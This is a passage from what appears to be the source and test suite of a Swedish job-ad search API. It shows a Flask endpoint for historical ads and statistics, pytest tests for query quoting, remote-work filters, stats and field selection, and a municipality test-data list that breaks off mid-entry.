code_count = {
item['key']: item['doc_count']
for item in aggs_result['aggregations']['antal_annonser']['buckets']}
return code_count
```
#### File: rest/endpoint/historical.py
```python
import logging
import time
from flask_restx import abort
from flask_restx import Resource
from jobtech.common.rest.decorators import check_api_key_and_return_metadata
from sokannonser.repository.platsannonser import fetch_platsannons
from sokannonser.repository.querybuilder import QueryBuilderType
from sokannonser.repository.stats.stats import get_stats
from sokannonser.rest.endpoint.common import QueryBuilderContainer, \
search_endpoint, mock_result_with_only_original_values
from sokannonser.rest.model.apis import ns_historical, open_results, job_ad
from sokannonser.rest.model.queries import load_ad_query, historical_query, stats_query
from sokannonser.rest.model.swagger import swagger_doc_params, swagger_filter_doc_params
from common import settings
import elasticapm
log = logging.getLogger(__name__)
querybuilder_container = QueryBuilderContainer()
@ns_historical.route('ad/<id>', endpoint='ad')
class AdById(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')] # TODO: Change api_identifier?
@ns_historical.doc(
description='Load a job ad by ID',
)
@ns_historical.response(401, 'Invalid API-key')
@ns_historical.response(404, 'Job ad not found')
@ns_historical.expect(load_ad_query)
@ns_historical.marshal_with(job_ad)
def get(self, id, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
result = fetch_platsannons(str(id))
if result.get('removed'):
abort(404, 'Ad not found')
else:
return mock_result_with_only_original_values([result])[0]
@ns_historical.route('search')
class Search(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')] # TODO: Change api_identifier?
@ns_historical.doc(
description='Search using parameters and/or freetext',
params={
settings.HISTORICAL_FROM: 'Search ads from this date',
settings.HISTORICAL_TO: 'Search ad until this date',
settings.REQUEST_TIMEOUT: 'Set the query timeout in seconds (some historical queries may take several minutes).',
**swagger_doc_params, **swagger_filter_doc_params
},
)
@ns_historical.response(401, 'Invalid API key')
@ns_historical.expect(historical_query)
@ns_historical.marshal_with(open_results)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
start_time = int(time.time() * 1000)
args = historical_query.parse_args()
return search_endpoint(querybuilder_container.get(QueryBuilderType.HISTORICAL_SEARCH), args, start_time)
@ns_historical.route('stats')
class Stats(Resource):
method_decorators = [check_api_key_and_return_metadata('pb')]
@ns_historical.doc(
description='Load stats by taxonomy type',
params={
settings.APIKEY: "Required API key",
settings.TAXONOMY_TYPE: "One or more taxonomy type, default will return all (available fields: "
"occupation-name, occupation-group, occupation-field, employment-type,"
" country, region, municipality, skill, language). ",
settings.STATS_BY: "Search taxonomy type with different fields",
settings.LIMIT: "Maximum number of statistical rows per taxonomy field"
},
)
@ns_historical.response(401, 'Invalid API key')
@ns_historical.expect(stats_query)
def get(self, **kwargs):
elasticapm.set_user_context(username=kwargs.get('key_app'), user_id=kwargs.get('key_id'))
args = stats_query.parse_args()
return get_stats(args)
```
#### File: api_tests/historical/test_historical_stats.py
```python
import sys
import pytest
import requests
from tests.test_resources.helper import get_search, get_search_expect_error, get_stats
from tests.test_resources.ad_fields_data_type import check_historical_stats
from tests.test_resources.historical import compare_keys, check_default_values, all_keys, all_stats, default_values
from tests.test_resources.settings import NUMBER_OF_ADS
from common.settings import TAXONOMY_TYPE_LIST
pytestmark = pytest.mark.historical
def test_all_stats_key_names(historical_stats):
compare_keys(historical_stats)
def test_all_stats_format(historical_stats):
"""
check types in the return value
"""
for key, stats in historical_stats.items():
check_historical_stats(stats)
def test_all_stats_sorting_order_in_stat_type(historical_stats):
"""
Checks that items for each stats type are sorted descending
"""
check_sort_order(historical_stats)
def check_sort_order(stats):
for key, stats in stats.items():
highest_value = sys.maxsize
for item in stats:
assert item['occurrences'] <= highest_value
highest_value = item['occurrences']
@pytest.mark.parametrize('limit', [0, 1, 2, 4, 6, 9, 10, 11, 99, 1025, '1'])
def test_all_stats_limit(session, limit):
stats = get_stats(session, {'limit': limit})
compare_keys(stats)
def test_all_stats_default_limit(historical_stats):
"""
Check that there are 10 items, except for 'employment-type' which only has 6 possible values
"""
check_default_values(historical_stats)
def test_all_stats_zero_limit(session):
"""
Check that all fields are present and their lists are empty when using limit: 0
"""
stats = get_stats(session, {'limit': 0})
compare_keys(stats)
def test_all_stats_none_limit(session):
"""
Check that all fields are present and their lists have default values when using limit: None
"""
stats = get_stats(session, {'limit': None})
compare_keys(stats)
check_default_values(stats)
@pytest.mark.smoke
@pytest.mark.parametrize("taxonomy_type", TAXONOMY_TYPE_LIST)
def test_taxonomy_type_single(session, taxonomy_type):
params = {'taxonomy-type': taxonomy_type}
result = get_stats(session, params)
assert len(result) == 1
if taxonomy_type == 'employment-type':
assert len(result[taxonomy_type]) == 6
else:
assert len(result[taxonomy_type]) == default_values
check_sort_order(result)
def test_taxonomy_type_all(session):
taxonomy_types = ','.join(TAXONOMY_TYPE_LIST) # comma-separated string
params = {'taxonomy-type': taxonomy_types}
result = get_stats(session, params)
assert len(result) == 9
for key, value in result.items():
if key == 'employment-type':
assert len(value) == 6
else:
assert len(value) == default_values
check_sort_order(result)
# SEARCH
@pytest.mark.smoke
@pytest.mark.parametrize("stats_type", ['occupation-name', 'occupation-group', 'municipality', 'region', 'country'])
def test_stats(session, stats_type):
"""
add checks
"""
result = get_search(session, {'stats': stats_type})
assert result['total']['value'] == NUMBER_OF_ADS
assert len(result) == 7
assert len(result['stats'][0]['values']) == 5
@pytest.mark.parametrize('stats_type', ['employment-type', 'language', 'skill'])
def test_bad_request(session, stats_type):
get_search_expect_error(session, {'stats': stats_type}, expected_http_code=requests.codes.bad_request)
def test_multiple_stats(session):
"""
Do call to stats with increasing number of parameters
"""
for ix, stats_type in enumerate(all_stats):
current_len = ix + 1
stats_list = all_stats[0:current_len]
print(stats_list)
params = {'stats': stats_list}
result = get_search(session, params)
result_stats = result['stats']
assert len(result_stats) == current_len
for item in result_stats:
assert len(item['values']) == 5
```
#### File: api_tests/jobstream/test_stream_live_data.py
```python
import pytest
from tests.test_resources.helper import get_stream
from common.settings import UPDATED_BEFORE_DATE
from tests.test_resources.test_settings import NUMBER_OF_ADS, DAWN_OF_TIME, current_time_stamp
# mark all tests in this file as @pytest.mark.jobstream
pytestmark = pytest.mark.jobstream
def test_stream_filter_on_date_interval(session):
params = {'date': DAWN_OF_TIME, UPDATED_BEFORE_DATE: current_time_stamp}
list_of_ads = get_stream(session, params)
assert len(list_of_ads) >= NUMBER_OF_ADS
```
#### File: searching/common/test_get_ad_by_id.py
```python
import random
import requests
import pytest
from tests.test_resources.helper import get_by_id
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.smoke
def test_get_by_id(session, random_ads):
ad_ids = []
for ad in random_ads:
ad_ids.append(ad['id'])
subset_of_ids = random.sample(ad_ids, 3)
for ad_id in subset_of_ids:
ad = get_by_id(session, ad_id)
assert ad['id'] == ad_id
def test_fetch_not_found_ad_by_id(session):
with pytest.raises(requests.exceptions.HTTPError):
get_by_id(session, ad_id='823069282306928230692823069282306928230692')
```
#### File: searching/common/test_quotes.py
```python
import pytest
from tests.test_resources.helper import get_search, compare
from tests.test_resources.test_settings import EXPECTED_GYMNASIE_LARARE
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.smoke
@pytest.mark.parametrize("query, expected_number_of_hits, identifier", [
('"gymnasielärare"', 18, 'a'),
("'gymnasielärare'", EXPECTED_GYMNASIE_LARARE, 'b'),
("\"gymnasielärare\"", 18, 'c'),
("\'gymnasielärare\'", EXPECTED_GYMNASIE_LARARE, 'd'),
("""gymnasielärare""", EXPECTED_GYMNASIE_LARARE, 'e'),
('''gymnasielärare''', EXPECTED_GYMNASIE_LARARE, 'f'),
('gymnasielärare', EXPECTED_GYMNASIE_LARARE, 'g'),
("gymnasielärare""", EXPECTED_GYMNASIE_LARARE, 'h'),
("gymnasielärare\"", EXPECTED_GYMNASIE_LARARE, 'i'),
("gymnasielärare\'", EXPECTED_GYMNASIE_LARARE, 'j'),
(r"""gymnasielärare""", EXPECTED_GYMNASIE_LARARE, 'k'),
(r'''gymnasielärare''', EXPECTED_GYMNASIE_LARARE, 'l'),
("gymnasielärare lärare", 259, 'm'),
("""'gymnasielärare'""", EXPECTED_GYMNASIE_LARARE, 'n'),
('''"gymnasielärare" "lärare"''', 357, 'o'),
('''"gymnasielärare lärare"''', 0, 'p'),
("\"gymnasielärare\"", 18, 'q'),
("\"gymnasielärare", 18, 'r'),
('''"gymnasielärare"''', 18, 's'),
("gymnasielärare", EXPECTED_GYMNASIE_LARARE, 't'),
('gymnasielärare', EXPECTED_GYMNASIE_LARARE, 'u'),
])
def test_query_with_different_quotes(session, query, expected_number_of_hits, identifier):
json_response = get_search(session, params={'q': query, 'limit': '0'})
compare(json_response['total']['value'], expected_number_of_hits, msg=f'Query: {query}')
@pytest.mark.parametrize('query, expected', [
('"c++', 62),
('"c++"', 62),
('"c+', 41),
('"c( ', 40),
])
def test_cplusplus_in_quotes(session, query, expected):
"""
Test for a bug where some quotes caused an 'internal server error' response
"""
param = {'q': query, 'limit': 0}
assert get_search(session, param)['total']['value'] == expected
@pytest.mark.parametrize("query, expected_number_of_hits", [
('python stockholm', 27),
('"python stockholm"', 0),
('"python" "stockholm"', 957),
('"python" stockholm', 843),
('python "stockholm"', 76),
('"python job in stockholm"', 0),
('"work from home" python stockholm', 27)
])
def test_query_with_quotes(session, query, expected_number_of_hits):
json_response = get_search(session, params={'q': query, 'limit': '100'})
compare(json_response['total']['value'], expected_number_of_hits, msg=f'Query: {query}')
```
#### File: searching/common/test_remote_work.py
```python
import pytest
from sokannonser.rest.model.swagger import REMOTE_MATCH_PHRASES
from tests.test_resources.helper import get_search, get_total
from tests.test_resources.test_settings import TEST_USE_STATIC_DATA
from common.settings import REMOTE
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on specific data set")
@pytest.mark.parametrize('remote, expected', [(True, 34), (False, 4995)])
def test_remote_number_of_ads(session, remote, expected):
params = {REMOTE: remote, 'limit': 100}
number_of_hits = get_search(session, params)['total']['value']
assert number_of_hits == expected
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on specific data set")
@pytest.mark.parametrize('query, expected_remote, expected_not_remote', [
('utvecklare', 2, 131),
('mötesbokare', 0, 9),
('tekniker', 0, 27),
('säljare', 1, 224),
])
def test_remote_query(session, query, expected_remote, expected_not_remote):
remote = get_total(session, {'q': query, REMOTE: True, 'limit': 0})
not_remote = get_total(session, {'q': query, REMOTE: False, 'limit': 0})
assert remote == expected_remote
assert not_remote == expected_not_remote
@pytest.mark.parametrize('query', ['hemifrån', 'säljare', 'java', 'lärare', 'tekniker'])
def test_remote_query_content(session, query):
"""
Check that ads have at least one phrase associated with remote work
in description or title when using 'remote': True
"""
successes = []
result = get_search(session, {'q': query, REMOTE: True, 'limit': 100})
hits = result['hits']
for hit in hits:
for phrase in REMOTE_MATCH_PHRASES:
if phrase in hit['description']['text'].lower() or phrase in hit['headline'].lower():
successes.append(True)
break
assert len(successes) >= len(hits)
@pytest.mark.parametrize("remote", [True, False])
def test_remote_binary(session, remote):
params = {REMOTE: remote, 'limit': 100}
response = get_search(session, params)
for hit in response['hits']:
text_to_check = f"{hit['description']['text']} {hit['headline']}".lower()
assert remote == any(x in text_to_check for x in REMOTE_MATCH_PHRASES)
@pytest.mark.parametrize("query", ['säljare', 'java', 'sjuksköterska'])
@pytest.mark.parametrize("remote", [True, False])
def test_remote_binary_with_query(session, query, remote):
params = {'q': query, REMOTE: remote, 'limit': 100}
response = get_search(session, params)
for hit in response['hits']:
text_to_check = f"{hit['description']['text']} {hit['headline']}".lower()
assert remote == any(x in text_to_check for x in REMOTE_MATCH_PHRASES)
def test_sum_remote(session):
remote_none = get_total(session, params={'limit': 0})
remote_true = get_total(session, params={'remote': True, 'limit': 0})
remote_false = get_total(session, params={'remote': False, 'limit': 0})
assert remote_false + remote_true == remote_none
```
#### File: searching/common/test_stats.py
```python
import pytest
from tests.test_resources.concept_ids import concept_ids_geo as geo
from tests.test_resources.helper import get_search, compare_multiple
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
@pytest.mark.smoke
@pytest.mark.parametrize("limit, stats_limit, expected_number_of_hits, expected_values", [
(10, 0, 10, 5),
(10, 10, 10, 10),
(10, 15, 10, 15)
])
def test_stats(session, limit, stats_limit, expected_number_of_hits, expected_values):
params = {'stats': 'region', 'offset': 0, 'limit': limit, 'stats.limit': stats_limit}
results_json = get_search(session, params)
compare_these = []
compare_these.append((len(results_json['hits']), expected_number_of_hits, "wrong number of hits"))
compare_these.append((len(results_json['stats'][0]['values']), expected_values, 'wrong stats.values'))
compare_multiple(compare_these)
def test_stats_details(session):
params = {'stats': 'region', 'offset': 0, 'limit': 0, 'stats.limit': 5}
results_json = get_search(session, params)
expected_results = [('Stockholms län', 1227, geo.stockholms_lan, '01'),
('Västra Götalands län', 779, geo.vastra_gotalands_lan, '14'),
('Skåne län', 643, geo.skane_lan, '12'),
('Östergötlands län', 249, geo.ostergotlands_lan, '05'),
('Jönköpings län', 195, geo.jonkopings_lan, '06'),
('Uppsala län', 55, geo.uppsala_lan, '03'),
]
compare_these = []
for index, result in enumerate(results_json['stats'][0]['values']): # results should be sorted
compare_these.append((result['term'], expected_results[index][0], 'wrong term'))
compare_these.append((result['count'], expected_results[index][1], 'wrong count'))
compare_these.append((result['concept_id'], expected_results[index][2], 'wrong concept_id'))
compare_these.append((result['code'], expected_results[index][3], 'wrong code'))
compare_multiple(compare_these)
```
#### File: searching/common/test_taxonomy_original_value.py
```python
import pytest
from tests.test_resources import elastic_data
from tests.test_resources.helper import get_by_id
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
def test_original(session):
for test_data in elastic_data.occupations_from_elastic:
# find occupation with legacy id and check that such value exists
assert (original_occupation := next(
(item for item in test_data['occupations'] if item["legacy_ams_taxonomy_id"] is not None),
None)) is not None
api_response = get_by_id(session, test_data['_id'])
assert original_occupation['concept_id'] == api_response['occupation']['concept_id']
```
#### File: searching/common/test_unspecified_sweden_workplace.py
```python
import pytest
from tests.test_resources.helper import get_search
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
def test_unspecified_sweden_workplace(session):
params = {'unspecified-sweden-workplace': 'true', 'offset': 0, 'limit': 100, 'stats': 'region'}
result_json = get_search(session, params)
hits = result_json['hits']
assert len(hits) >= 46 # for use on static test data or prod
for hit in hits:
assert hit['workplace_address']['region'] is None
assert hit['workplace_address']['municipality'] is None
assert hit['workplace_address']['municipality_code'] is None
assert hit['workplace_address']['municipality_concept_id'] is None
assert hit['workplace_address']['region'] is None
assert hit['workplace_address']['region_code'] is None
assert hit['workplace_address']['region_concept_id'] is None
assert hit['workplace_address']['street_address'] is None
assert hit['workplace_address']['postcode'] is None
assert hit['workplace_address']['city'] is None
assert hit['workplace_address']['coordinates'] == [None, None]
assert hit['relevance'] == 0.0
```
#### File: searching/common/test_xfields.py
```python
import json
import copy
import pytest
import requests
from tests.test_resources.test_settings import NUMBER_OF_ADS
from tests.test_resources.test_settings import test_headers, TEST_URL
X_FIELDS = 'X-Fields'
# marks all tests as jobsearch and historical
pytestmark = [pytest.mark.jobsearch, pytest.mark.historical]
def _get_with_additional_headers(additional_headers, params={}):
headers = copy.deepcopy(test_headers)
headers.update(additional_headers)
response = requests.get(TEST_URL + "/search", params=params, headers=headers)
response.raise_for_status()
return json.loads(response.content.decode('utf8'))
def test_empty_x_field():
"""
Expect the same response is if x-fields header is not used
"""
r = _get_with_additional_headers({X_FIELDS: ''})
assert r['total']['value'] == NUMBER_OF_ADS
assert len(r) == 7
assert len(r['hits']) == 10
assert len(r['hits'][0]) == 35
def test_x_fields_ad_teaser():
x_fields_for_ad_teaser = "hits{id, publication_date, publication_date, headline, occupation, employer, workplace_address, positions}"
r = _get_with_additional_headers({X_FIELDS: x_fields_for_ad_teaser})
assert len(r) == 1
assert len(r['hits']) == 10
assert len(r['hits'][0]) == 6
def test_x_fields_workplace_address():
x_fields_for_address = "hits{workplace_address{municipality, municipality_code,region,region_code, country, country_code , street_address, postcode, city, coordinates}}"
r = _get_with_additional_headers({X_FIELDS: x_fields_for_address})
assert len(r) == 1
assert len(r['hits']) == 10
assert len(r['hits'][0]) == 1
assert len(r['hits'][0]['workplace_address']) == 10
def test_x_fields_with_query():
params = {'q': 'sjuksköterska'}
r = _get_with_additional_headers({X_FIELDS: "hits{headline, occupation, employer, workplace_address}"}, params)
assert len(r['hits'][0]) == 4
assert len(r['hits']) == 10
for field in ['headline', 'occupation', 'employer', 'workplace_address']:
no_key_error = r['hits'][0][field]
```
#### File: searching/jobsearch/test_complete_with_filters.py
```python
import pytest
from tests.test_resources.helper import get_complete
from tests.test_resources.concept_ids import concept_ids_geo as geo
# mark all tests in this file as @pytest.mark.jobsearch
pytestmark = pytest.mark.jobsearch
@pytest.mark.parametrize('query', ['sjukköt', 'sjuksköt', 'servit', 'srvitr', 'progr', 'prgram'])
def test_different_numbers_with_filter(session, query):
"""
Check that number of hits is lower when using a geographical filter and a misspelled word
"""
json_response_no_filter = get_complete(session, params={'q': query})
top_value_no_filter = json_response_no_filter['typeahead'][0]['occurrences']
top_word_no_filter = json_response_no_filter['typeahead'][0]['value']
json_response_municipality_filter = get_complete(session, params={'q': query, 'municipality': geo.stockholm})
top_value_municipality_filter = json_response_municipality_filter['typeahead'][0]['occurrences']
top_word_municipality_filter = json_response_municipality_filter['typeahead'][0]['value']
json_response_region_filter = get_complete(session, params={'q': query, 'region': geo.stockholms_lan})
top_value_region_filter = json_response_region_filter['typeahead'][0]['occurrences']
top_word_regionfilter = json_response_region_filter['typeahead'][0]['value']
msg_city = f"Query: {query}, no filter: {top_word_no_filter}: {top_value_no_filter}, geo filter: {top_word_municipality_filter}: {top_value_municipality_filter} "
msg_region = f"Query: {query}, no filter: {top_word_no_filter}: {top_value_no_filter}, geo filter: {top_word_regionfilter}: {top_value_region_filter} "
assert top_value_no_filter > top_value_municipality_filter, msg_city
assert top_value_no_filter > top_value_region_filter, msg_region
assert top_value_municipality_filter > 0
assert top_value_region_filter > 0
```
#### File: searching/jobsearch/test_freetext_bool_complete.py
```python
import pytest
import copy
from tests.test_resources.helper import get_complete, get_complete_with_headers
from common.settings import X_FEATURE_FREETEXT_BOOL_METHOD
from tests.test_resources.test_settings import test_headers
@pytest.mark.jobsearch
@pytest.mark.parametrize("query",
['stockholm sj', 'stor s', 'lärare st', 'special a', 'stockholm ', ' ', 'programmering '])
def test_complete_endpoint_with_freetext_bool_method(session, query):
"""
test of /complete endpoint with X_FEATURE_FREETEXT_BOOL_METHOD set to 'and' / 'or' / default value
Verifies that results are identical regardless of bool method
"""
params = {'q': query, 'limit': 0}
# no special header, default values are used
result_default = get_complete(session, params)
# use 'and'
tmp_headers = copy.deepcopy(test_headers)
tmp_headers[X_FEATURE_FREETEXT_BOOL_METHOD] = 'and'
result_and = get_complete_with_headers(session, params, tmp_headers)
# use 'or
tmp_headers[X_FEATURE_FREETEXT_BOOL_METHOD] = 'or'
result_or = get_complete_with_headers(session, params, tmp_headers)
# check that results are identical regardless of which bool_method is used
assert result_default['typeahead'] == result_and['typeahead'] == result_or['typeahead']
```
#### File: integration_tests/search/conftest.py
```python
import os
import pytest
import requests
from tests.test_resources.test_settings import test_headers
@pytest.fixture
def integration_session(scope="session"):
"""
creates a Session object which will persist over the entire test run ("session").
http connections will be reused (higher performance, less resource usage)
Returns a Session object
"""
s = requests.sessions.Session()
s.headers.update(test_headers)
return s
@pytest.fixture
def integration_url(scope="session"):
"""
returns an url
"""
test_url = os.getenv('TEST_URL_INTEGRATION', 'http://127.0.0.1')
port = os.getenv('TEST_PORT_INTEGRATION', 5000)
return f"{test_url}:{port}"
```
#### File: integration_tests/search/test_complete.py
```python
import pytest
import logging
from sokannonser.repository.querybuilder import QueryBuilder
from sokannonser.repository.typeahead import _check_search_word_type
@pytest.mark.parametrize("search_text, expected_result", [
('', None),
('stockholm', 'location'),
('"stockholm', None),
('städare &', None), # could be improved to return 'occupation', but this is what we get now (and no 400)
])
def test_check_search_word_type_nar_862_and_1107(caplog, search_text, expected_result):
"""
Tests for search word type
"""
result = _check_search_word_type(search_text, QueryBuilder())
log_levels = [tup[1] for tup in caplog.record_tuples]
assert logging.ERROR not in log_levels, "Logging error from elastic call"
assert logging.WARNING not in log_levels, "Logging warning from elastic call"
assert result == expected_result
```
#### File: integration_tests/search/test_taxonomy.py
```python
import logging
import pytest
import re
from common import taxonomy as t
from sokannonser.repository.valuestore import get_stats_for
log = logging.getLogger(__name__)
tax_stat = [[t.OCCUPATION], [t.GROUP], [t.FIELD], [t.SKILL]]
tax_other = [[t.MUNICIPALITY], [t.REGION]]
tax_noexist = [[' ', 'blabla', '']]
@pytest.mark.parametrize("taxonomy_type", tax_stat + tax_other + tax_noexist)
def test_get_stats_for_taxonomy_type(taxonomy_type):
if taxonomy_type not in tax_stat:
try:
get_stats_for(taxonomy_type)
except KeyError as e:
print('KeyError exception. Reason: taxonomy type %s' % str(e))
assert "'" + taxonomy_type + "'" == str(e)
except Exception as ex:
pytest.fail('ERROR: This is not a KeyError exception: %s (%s)' %
(str(ex), taxonomy_type), pytrace=False)
else: # taxonomy_type is in 5 mentioned in get_stats_for()
for k, v in get_stats_for(taxonomy_type).items():
assert is_str_of_int(k) # check k is string of int
assert isinstance(v, int) # check v is int
@pytest.mark.parametrize("taxonomy_type", (tax_noexist))
def test_get_stats_for_taxonomy_type_neg(taxonomy_type):
assert get_stats_for(taxonomy_type) == {}
@pytest.mark.parametrize("taxonomy_type", tax_other)
def test_get_stats_for_taxonomy_type_other(taxonomy_type):
assert get_stats_for(taxonomy_type) != {}
@pytest.mark.parametrize("v", ['a', 'abc', '-1'])
def test_is_char_as_str(v):
with pytest.raises(AssertionError):
assert is_int(v)
@pytest.mark.parametrize("v", ['1', '0', '10000'])
def test_is_int_as_str(v):
assert is_int(v)
@pytest.mark.parametrize("v", [0, 1, 1000])
def test_is_int_as_int(v):
with pytest.raises(TypeError):
assert is_int(v)
def is_int(value):
return re.match(r'[0-9]+$', value) is not None
def is_str_of_int(str_to_check):
return re.match(r'^[\w\d_-]*$', str_to_check) is not None # check if it is a string of int
```
#### File: test_resources/concept_ids/municipality.py
```python
from tests.test_resources.helper import select_random_from_list
def get_muncipalities_with_hits():
with_hits = []
for m in municipalities:
if m['hits'] > 0:
with_hits.append(m)
return with_hits
def get_ten_random_municipalities_with_hits():
return select_random_from_list(full_list=get_muncipalities_with_hits(), how_many=10)
municipalities = [
{'id': 'XWKY_c49_5nv', 'name': '<NAME>', 'type': 'municipality', 'code': '0114', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 14,
'ad_ids': ['24641303', '24641232', '24636479', '24630746', '24627847', '24612651', '24608713', '24603235',
'24598186', '24580428']},
{'id': 'K4az_Bm6_hRV', 'name': 'Vallentuna', 'type': 'municipality', 'code': '0115', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 7,
'ad_ids': ['24649005', '24648696', '24641486', '24611368', '24590586', '24556609', '24519998']},
{'id': '8gKt_ZsV_PGj', 'name': 'Österåker', 'type': 'municipality', 'code': '0117', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 8,
'ad_ids': ['24640198', '24634294', '23699999', '24624738', '24577311', '24576867', '24532362', '24518247']},
{'id': '15nx_Vut_GrH', 'name': 'Värmdö', 'type': 'municipality', 'code': '0120', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24632907', '24631461', '24620746', '24614472', '24610276', '24602803', '24590922', '24577016',
'24574442', '24509435']},
{'id': 'qm5H_jsD_fUF', 'name': 'Järfälla', 'type': 'municipality', 'code': '0123', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 16,
'ad_ids': ['24648843', '24647618', '24638674', '24637614', '24627854', '24626944', '24623198', '24622371',
'24619258', '24616216']},
{'id': 'magF_Gon_YL2', 'name': 'Ekerö', 'type': 'municipality', 'code': '0125', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24647866', '24643150', '24638266', '24637006', '24626766', '24618010', '24617986', '24609385',
'24601615', '24541639']},
{'id': 'g1Gc_aXK_EKu', 'name': 'Huddinge', 'type': 'municipality', 'code': '0126', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 47,
'ad_ids': ['24649947', '24649919', '24649818', '24647357', '24641723', '24640701', '24639742', '24638132',
'24636901',
'24633282']},
{'id': 'CCVZ_JA7_d3y', 'name': 'Botkyrka', 'type': 'municipality', 'code': '0127', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 20,
'ad_ids': ['24649834', '24649058', '24645367', '24642952', '24637457', '24635479', '24634919', '24629461',
'24622699', '24615777']},
{'id': '4KBw_CPU_VQv', 'name': 'Salem', 'type': 'municipality', 'code': '0128', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 2, 'ad_ids': ['24635325', '24596057']},
{'id': 'Q7gp_9dT_k2F', 'name': 'Haninge', 'type': 'municipality', 'code': '0136', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 17,
'ad_ids': ['24650480', '24647950', '24630278', '24623592', '24616301', '24614366', '24606163', '24604574',
'24589305', '24586867']},
{'id': 'sTPc_k2B_SqV', 'name': 'Tyresö', 'type': 'municipality', 'code': '0138', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 7,
'ad_ids': ['24643255', '24624425', '24618754', '24614988', '24613766', '24598566', '24597634']},
{'id': 'w6yq_CGR_Fiv', 'name': 'Upplands-Bro', 'type': 'municipality', 'code': '0139', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24649677', '24644808', '24643168', '24643140', '24641431', '24554813', '24628120', '24614768',
'24604245', '24603297']},
{'id': 'mBKv_q3B_SK8', 'name': 'Nykvarn', 'type': 'municipality', 'code': '0140', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 7,
'ad_ids': ['24649772', '24645739', '24644051', '24637850', '24630053', '24625534', '24589239']},
{'id': 'onpA_B5a_zfv', 'name': 'Täby', 'type': 'municipality', 'code': '0160', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 25,
'ad_ids': ['24640762', '24640430', '24640171', '24637534', '24625126', '24624931', '24613119', '24611999',
'24610353', '24609668']},
{'id': 'E4CV_a5E_ucX', 'name': 'Danderyd', 'type': 'municipality', 'code': '0162', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 18,
'ad_ids': ['24650650', '24650652', '24643754', '24639629', '24638561', '24638260', '24614446', '24611837',
'24609748', '24597392']},
{'id': 'Z5Cq_SgB_dsB', 'name': 'Sollentuna', 'type': 'municipality', 'code': '0163', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 8,
'ad_ids': ['24648025', '24646503', '24634127', '24627899', '24624197', '24612586', '24605084', '24604254']},
{'id': 'AvNB_uwa_6n6', 'name': 'Stockholm', 'type': 'municipality', 'code': '0180', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 775,
'ad_ids': ['24650983', '24650895', '24650889', '24650784', '24650759', '24650748', '24650728', '24650682',
'24650497', '24650349']},
{'id': 'g6hK_M1o_hiU', 'name': 'Södertälje', 'type': 'municipality', 'code': '0181', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 52,
'ad_ids': ['24650352', '24647317', '24646726', '24644816', '24644223', '24642658', '24642513', '24641912',
'24641018', '24640024']},
{'id': 'aYA7_PpG_BqP', 'name': 'Nacka', 'type': 'municipality', 'code': '0182', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 27,
'ad_ids': ['24649527', '24649274', '24645898', '24644478', '24581554', '24636080', '24634930', '24628301',
'24627163', '24621428']},
{'id': 'UTJZ_zHH_mJm', 'name': 'Sundbyberg', 'type': 'municipality', 'code': '0183', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24643175', '24638423', '24637895', '24621759', '24611001', '24605909', '24602420', '24599279',
'24590884', '24552397']},
{'id': 'zHxw_uJZ_NJ8', 'name': 'Solna', 'type': 'municipality', 'code': '0184', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 61,
'ad_ids': ['24650876', '24649894', '24649491', '24648158', '24644646', '24643212', '24641524', '24640665',
'24639217', '24638221']},
{'id': 'FBbF_mda_TYD', 'name': 'Lidingö', 'type': 'municipality', 'code': '0186', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 13,
'ad_ids': ['24648043', '24648032', '24645326', '24631039', '24238908', '24611032', '24606240', '24604895',
'24603294', '24593721']},
{'id': '9aAJ_j6L_DST', 'name': 'Vaxholm', 'type': 'municipality', 'code': '0187', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 2, 'ad_ids': ['24618958', '24542055']},
{'id': 'btgf_fS7_sKG', 'name': 'Norrtälje', 'type': 'municipality', 'code': '0188', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 26,
'ad_ids': ['24647156', '24645902', '24645523', '24644525', '24638282', '24639147', '24636961', '24633665',
'24628281', '24626958']},
{'id': '8ryy_X54_xJj', 'name': 'Sigtuna', 'type': 'municipality', 'code': '0191', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 19,
'ad_ids': ['24649537', '24648645', '24645926', '24643945', '24636904', '24636803', '24634498', '24633655',
'24631760', '24628534']},
{'id': '37UU_T7x_oxG', 'name': 'Nynäshamn', 'type': 'municipality', 'code': '0192', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 12,
